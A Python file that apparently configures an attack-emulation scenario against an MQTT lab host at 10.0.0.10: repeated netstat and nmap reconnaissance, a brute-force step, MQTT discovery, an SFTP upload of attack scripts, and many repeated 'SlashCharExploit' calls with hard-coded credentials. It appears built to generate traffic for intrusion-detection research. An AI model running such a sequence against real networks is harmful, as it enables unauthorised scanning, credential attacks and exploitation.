from APT import *

step_seq = [(NetstatRecStep(0), 1), (PauseStep(),), (Nmap192T4RecStep(0), 1), (PauseStep(),),
            (Nmap192T5RecStep(0), 1), (PauseStep(),), (Nmap10T5RecStep(0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap192T4RecStep(0), 1), (PauseStep(),),
            (Nmap192T5RecStep(0), 1), (PauseStep(),), (Nmap10T5RecStep(0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap192T4RecStep(0), 1), (PauseStep(),),
            (Nmap192T5RecStep(0), 1), (PauseStep(),), (Nmap10T5RecStep(0), 1), (PauseStep(),),
            (BruteForceStep(action='t', pause=0, host="10.0.0.10"),),
            (PauseStep(),), (NmapMQTTDiscStep("10.0.0.10", pause=0), 1), (PauseStep(),),
            (NmapBannerDiscStep("10.0.0.10", pause=0), 1), (PauseStep(),), (MqttCatDiscStep("10.0.0.10", pause=0), 1),
            (PauseStep(),),
            (NmapSubDiscStep("10.0.0.10", pause=0), 1), (PauseStep(),), (PauseStep(),),
            (NmapMQTTDiscStep("10.0.0.10", pause=0), 1), (PauseStep(),),
            (NmapBannerDiscStep("10.0.0.10", pause=0), 1), (PauseStep(),), (MqttCatDiscStep("10.0.0.10", pause=0), 1),
            (PauseStep(),),
            (NmapSubDiscStep("10.0.0.10", pause=0), 1), (PauseStep(),), (PauseStep(),),
            (NmapMQTTDiscStep("10.0.0.10", pause=0), 1), (PauseStep(),),
            (NmapBannerDiscStep("10.0.0.10", pause=0), 1), (PauseStep(),),
            (MqttCatDiscStep("10.0.0.10", pause=0), 1), (PauseStep(),),
            (NmapSubDiscStep("10.0.0.10", pause=0), 1), (PauseStep(),),
            (SftpInstStep("10.0.0.10", ["/slash_char_attack.py", "/mqtt_utilities.py"], pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
